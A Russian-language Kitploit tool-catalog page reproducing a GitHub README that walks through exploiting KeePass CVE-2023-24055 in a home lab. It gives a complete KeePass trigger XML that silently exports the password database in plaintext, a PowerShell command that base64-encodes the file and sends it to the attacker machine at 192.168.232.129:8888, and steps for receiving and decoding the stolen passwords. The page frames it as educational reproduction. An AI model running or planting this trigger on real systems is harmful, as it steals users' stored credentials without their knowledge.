Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
KeePass-CVE-2023-24055 — Воспроизведение KeePass CVE-2023-24055 | Kitploit
Инструменты/GitHubGitHub/zwlsix/keepass-cve-2023-24055
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксфильтрация данныхОбучение и ОбразованиеЛаборатории и Практика
GitHubzwlsix/keepass-cve-2023-24055

KeePass-CVE-2023-24055

Воспроизведение KeePass CVE-2023-24055

Репозиторий
13 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

KeePass-CVE-2023-24055

Воспроизведение KeePass CVE-2023-24055 Воспроизведение KeePass CVE-2023-24055

  1. Подготовьте машины: Kali (192.168.232.129), Windows 10 (192.168.232.128)

  2. Версия KeePass: 2.53

Рисунок 1

  1. Принцип: изменив конфигурационный файл KeePass.config.xml, добавьте конфигурацию триггера: экспорт паролей в открытом виде и загрузка их на сервер атакующего; XML-код для добавления триггера приведён ниже:

Здесь поле <Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter> задаёт локальный путь для экспорта паролей в открытом виде

Для передачи файла с паролями используется PowerShell с методом GET

root@kitploit:~
<Parameter>PowerShell.exe</Parameter>
<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
root@kitploit:~
<Triggers>
				<Trigger>
					<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
					<Name>exploit</Name>
					<Events>
						<Event>
							<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
							<Parameters>
								<Parameter>0</Parameter>
								<Parameter />
							</Parameters>
						</Event>
					</Events>
					<Conditions />
					<Actions>
						<Action>
							<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
							<Parameters>
								<Parameter>c:\Users\Long\AppData\Local\Temp\exploit.xml</Parameter>
								<Parameter>KeePass XML (2.x)</Parameter>
								<Parameter />
								<Parameter />
							</Parameters>
						</Action>
						<Action>
							<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
							<Parameters>
								<Parameter>PowerShell.exe</Parameter>
								<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\Long\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.232.129:8888/$var -Method GET </Parameter>
								<Parameter>False</Parameter>
								<Parameter>1</Parameter>
								<Parameter />
							</Parameters>
						</Action>
					</Actions>
				</Trigger>
			</Triggers>
  1. Измените файл KeePass.config.xml, добавьте XML-конфигурацию и сохраните (добавляется внутри тега <TriggerSystem></TriggerSystem>), затем откройте KeePass, чтобы убедиться, что триггер добавлен успешно:

tu2

  1. На Kali выполните команду python3 -m http.server 8888, чтобы запустить веб-сервер для приёма экспортированных паролей в открытом виде

tu3

  1. Откройте KeePass, создайте новую запись и сохраните её — триггер сработает; проверьте содержимое, полученное на Kali:

tu4

  1. Скопируйте содержимое в файл и декодируйте его с помощью base64 — так вы получите пароли в открытом виде

tu5

tu6

Справочные материалы: https://github.com/alt3kx/CVE-2023-24055_PoC

https://www.youtube.com/watch?v=tqK1bns51ek

Скачать инструмент